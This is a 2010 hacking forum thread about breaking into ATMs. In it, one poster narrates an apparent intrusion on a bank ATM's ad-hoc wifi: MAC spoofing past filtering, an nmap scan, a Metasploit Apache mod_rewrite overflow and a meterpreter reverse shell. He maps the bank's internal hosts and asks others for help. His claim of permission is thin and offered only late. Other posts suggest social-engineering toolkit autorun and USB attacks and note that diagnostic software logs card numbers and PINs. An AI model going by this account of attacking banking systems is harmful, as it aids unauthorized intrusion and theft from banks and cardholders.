Rooting Atms :)

[Trip]

!

watch this when you've watched the above ...

posted aug 1st

enjoys :D

Edited August 7, 2010 by Trip

[okiwan]

i read about his demonstration not too long ago. i wish i had the balls to even try that. but thats a quick way to a prison cell.

[darkside92]

i seen those insane and it shows people how easy it is to access peoples money

[deleted]

Well, ATM's are getting more and more insecure.

I worked in NCR briefly, and they just keep adding more and more stuff such as Wireless Cards and Internet Connections DIRECT into the same machine that handles the money processing.

The software most ATM's run now is Windows (NT or XP) with no AV or Firewall and run old version of software.

I smell a recipe for disaster.

[Infiltrator]

I haven't used ATMs for a very long time. I have a tendency of always using my banking cards, for purchasing goods, I know my bank may charge me transaction fees but its a lot safer that way.

If I need cash, I could always go to bank and ask the teller I would like to redraw some money, or go to the supermarket buy something and then tell the check out operator that I would like to take some cash out.

[okiwan]

i dont even have a bank account.

[Guest Deleted_Account]

Not sure if this is just my bank or if i am doing something wrong but... I went to my local Scotia Bank and thought about wifi on ATM's so I pulled out my old pocket PC and ran a scan for any AP's sure enough i find one labeled: ScotiaABMXXXX (the X's are numbers guessing there are the location or ABM number). any ways after try to connect (no encryption) it kicks after a few seconds. Trying again with BT4 and same thing. the connection type is Ad-HOC and no encryption is set but SOMETHING (maybe mac filtering?) is kicking as soon as i connect. Anyone know if this is how it's supposed to be? I was just messing aroung after hearing about it and all but it doesn't let me connect.

[Zimmer]

I would guess Mac filtering or maybe just limits connections to just one pc that manages it. Did you try and see if any other computers were connected to that network

[Infiltrator]

I would guess Mac filtering or maybe just limits connections to just one pc that manages it. Did you try and see if any other computers were connected to that network

Mac filtering won't be very effective, as it could be easily altered or faked. So any one could pose as that legitimate machine and attack the system.

Limiting the number of connections and ensuring the system is fully harden by a high-end firewall is one way of securing the system. The system shouldn't be entirely relying on a single sign on interface, there should be other means for authenticating, that way if an attacker manages to crack the first sign on interface, he could be presented with a more sophisticated or hard to break authentication system.

Edited August 9, 2010 by Infiltrator

[Guest Deleted_Account]

Mac filtering won't be very effective, as it could be easily altered or faked. So any one could pose as that legitimate machine and attack the system.

Limiting the number of connections and ensuring the system is fully harden by a high-end firewall is one way of securing the system. The system shouldn't be entirely relying on a single sign on interface, there should be other means for authenticating, that way if an attacker manages to crack the first sign on interface, he could be presented with a more sophisticated or hard to break authentication system.

Well, sadly for the bank at least, it was mac filtering I scanned again today and the were 2 clients. I spoofed to one of their macs and was connected. and..... guess what i find when i scan with nmap: apache so i run metasploit (as it was exploitable and on a win2000 machine. Now this is where things get weird.. the ATM's mac addy is 59-56-3B-8A-7B-F2 (no info when i did a look up). but after connecting it seems i was "ported"? into a different machine as the new addy matches the 2nd client of 03-00-E2-CF-77-4F (again no info) so somehow after connecting to ScotiaABMXXXX with the fake mac of client one (75-74-3C-CA-5E-51) I somehow get sent to Client 2 (Running black ice service and another unknown service on port 8942) I am guessing this is a honeypot but not sure. also forgot to mention before but apache is there for the "login/upload" site for updating the machine and as said by Infiltrator they need a more secure login like protect the Ad-hoc system with WPA2 (AES) and keep the login page but instead they use mac filtering and an old (exploitable) version of apache on an OLD window 2000 machine. Any ways have yet to find away back to the ATM after i get "sent" to the 2nd client (honeypot?).

any ideas on how its doing this?

[Trip]

found this ... http://www.mydigitallife.info/2006/09/25/a...aster-password/

and this ...

http://www.theregister.co.uk/2010/07/28/atm_hacking_demo/

To streamline his work, Jack developed an exploit kit he calls Dillinger, named after the 1930s bank robber. It can be used to access ATMs that are connected to the internet or the telephone system, which Jack said is true of most machines. The researcher has developed a rootkit dubbed Scrooge, which is installed once Dillinger has successfully penetrated a machine.

apparently the vulnerability described in the videos above has been patched.

Edited August 10, 2010 by Trip

[deleted]

Another Problem with ATM's (atleast from NCR) is that they all come with the manufacturers diagnostic software. This may seems harmless... but the diagnostic software has a utility to log card numbers and pin numbers and not only that, but it can periodically email this log. In the testing labs, this functionality is very useful but imagine if someone actually got into an ATM's software, and set this up to email the numbers and pins to themselves.

[Infiltrator]

Well, sadly for the bank at least, it was mac filtering I scanned again today and the were 2 clients. I spoofed to one of their macs and was connected. and..... guess what i find when i scan with nmap: apache so i run metasploit (as it was exploitable and on a win2000 machine. Now this is where things get weird.. the ATM's mac addy is 59-56-3B-8A-7B-F2 (no info when i did a look up). but after connecting it seems i was "ported"? into a different machine as the new addy matches the 2nd client of 03-00-E2-CF-77-4F (again no info) so somehow after connecting to ScotiaABMXXXX with the fake mac of client one (75-74-3C-CA-5E-51) I somehow get sent to Client 2 (Running black ice service and another unknown service on port 8942) I am guessing this is a honeypot but not sure. also forgot to mention before but apache is there for the "login/upload" site for updating the machine and as said by Infiltrator they need a more secure login like protect the Ad-hoc system with WPA2 (AES) and keep the login page but instead they use mac filtering and an old (exploitable) version of apache on an OLD window 2000 machine. Any ways have yet to find away back to the ATM after i get "sent" to the 2nd client (honeypot?).

any ideas on how its doing this?

Exploitable yehh, what apache version are you using? and what exploit and payload did you use? Sorry for asking, I want to try on my computer lab. By the way, did you have Apache running on a normal PC or VM?

[Guest Deleted_Account]

Exploitable yehh, what apache version are you using? and what exploit and payload did you use? Sorry for asking, I want to try on my computer lab. By the way, did you have Apache running on a normal PC or VM?

First off I'll answer your questions: the apache version is Apache 2.0.58 and i used the "mod_rewrite Remote Overflow Exploit (win2k3)" exploit. As for the payload i used meterpreter reverse (I think.. it's the one that connects right back to you). Any ideas on how/why I am being sent to Client to after I connect to the meterpreter session? Am I doing something wrong?

Now secondly, as i know this is a legal gray zone, I would like to upload some Packet captures but if thats okay. I will wait for conformation before I do so.

NOTE: I do have permission to be running these tests as it's my friends ABM/ATM.

[Infiltrator]

First off I'll answer your questions: the apache version is Apache 2.0.58 and i used the "mod_rewrite Remote Overflow Exploit (win2k3)" exploit. As for the payload i used meterpreter reverse (I think.. it's the one that connects right back to you). Any ideas on how/why I am being sent to Client to after I connect to the meterpreter session? Am I doing something wrong?

Now secondly, as i know this is a legal gray zone, I would like to upload some Packet captures but if thats okay. I will wait for conformation before I do so.

NOTE: I do have permission to be running these tests as it's my friends ABM/ATM.

Hi X942,

The reason I asked, was because I've just got into Metasploits and haven't been having much luck with exploiting my target VMs lately.

I think it may not be possible for me to exploit my targets, since they all seem to have the latest patches.

Now going back to your first question, do you have the LHOST and RHOST set right. Lhost should be set your attacker ip and the RHOST to the target IP.

What errors are you receiving if any, are you able to get a reverse shell of the exploited machine.

Edited August 11, 2010 by Infiltrator

[Guest Deleted_Account]

Hi X942,

The reason I asked, was because I've just got into Metasploits and haven't been having much luck with exploiting my target VMs lately.

I think it may not be possible for me to exploit my targets, since they all seem to have the latest patches.

Now going back to your first question, do you have the LHOST and RHOST set right. Lhost should be set your attacker ip and the RHOST to the target IP.

What errors are you receiving if any, are you able to get a reverse shell of the exploited machine.

Same here I have never had much luck with VM's that are fully patched besides maybe once or twice where I set up a malicious website (although my VM had to have Avast disabled since it detected it instantly; didn't use any encoding on the payload that time). You may want to try the new version of S.E.T (Social Engineering Toolkit) as it as some nice new features like USB/CD-ROM auto-run exploits, more java based exploits, and (if i remember right) USB HID (rubber ducky) use as well. To get the new version just update from the existing (0.3 i believe) one in BT4 ( I assume thats what you are using).

As for my problem, I am pretty sure, but will double check, that the Lhost and Rhost are set right. Also the only "error" I am getting is Exploit failed: No encoders encoded the buffer successfully. However the meterpreter shell still loads and I can connect (except to the "honeypot"/Client 2) I am guessing that somehow either my attack is being forwarded to client 2, my shell/payload is being forwarded to client 2, I am doing something wrong, or apache is really installed on Client 2 and they are using port forwarding so port 80 on the atm so it directs it to the client 2.

[Infiltrator]

Same here I have never had much luck with VM's that are fully patched besides maybe once or twice where I set up a malicious website (although my VM had to have Avast disabled since it detected it instantly; didn't use any encoding on the payload that time). You may want to try the new version of S.E.T (Social Engineering Toolkit) as it as some nice new features like USB/CD-ROM auto-run exploits, more java based exploits, and (if i remember right) USB HID (rubber ducky) use as well. To get the new version just update from the existing (0.3 i believe) one in BT4 ( I assume thats what you are using).

As for my problem, I am pretty sure, but will double check, that the Lhost and Rhost are set right. Also the only "error" I am getting is Exploit failed: No encoders encoded the buffer successfully. However the meterpreter shell still loads and I can connect (except to the "honeypot"/Client 2) I am guessing that somehow either my attack is being forwarded to client 2, my shell/payload is being forwarded to client 2, I am doing something wrong, or apache is really installed on Client 2 and they are using port forwarding so port 80 on the atm so it directs it to the client 2.

I am not using Backtrack, I am using Metasploit framework 3.4.2. I haven't had a chance to play with backtrack yet. At one stage before I was able to almost exploit my target but the VM's AV blocked it.

I tried running the exploit again, without any protection on the VM but it failed. It said something about no session could be created. I then tried using encoders with the AV turned off but didn't work. I have a feeling that my VM is fully patched and that could be why no exploits are working.

I am gonna be on trying until, I can get a full penetration.

[Trip]

lol ... http://www.engadget.com/2009/08/03/atm-sca...onic-criminals/

[Guest Deleted_Account]

I am not using Backtrack, I am using Metasploit framework 3.4.2. I haven't had a chance to play with backtrack yet. At one stage before I was able to almost exploit my target but the VM's AV blocked it.

I tried running the exploit again, without any protection on the VM but it failed. It said something about no session could be created. I then tried using encoders with the AV turned off but didn't work. I have a feeling that my VM is fully patched and that could be why no exploits are working.

I am gonna be on trying until, I can get a full penetration.

I managed to get a meterpreter shell on my Fully Patched XP SP3 VM using metasploits latest DB update. Before trying again do 2 things 1) Make sure metaslpoit DB is up-to-date and 2) if still no luck re-install and try again Thats what i had to do before it would work again.

As for the ATM i found out what was happening:

Scotia using a system like this:

ATM (Client 1)

HoneyPot (Client 2)

Debug (client 3)

Now while scanning wifi you see ScotiaBank-XXXX as the ssid. This is actually being broad-casted by the ATM. Now here's where it gets tricky; When you connect to the ssid first you have to pass through MAC address Filtering (easy enough as you see client 2 on the network with airodump-ng) next you can do one of 2 things:

1) Connect to 10.0.0.104:8753 and be prompted with a SSL encrypted "Debug" page with upgrade and other options (passworded).

OR

2) Port Scan and see an Exploitable version of Apache running on port 80.

Now it seems after connecting to the ssid you are tunneled through to Client 2 (as port scans hit this and client 3 only) no exploited Apache gets no where as it is a HoneyPot of sorts. However if you can exploit client 3 you could upload a malicious payload!

the debug client is apparently running Linux with apache on 8753 (not exploitable). I did try to trick it into thinking I was the debug client and send some commands but no go. Must be some kind of handshake or hash check before it allows you to do so.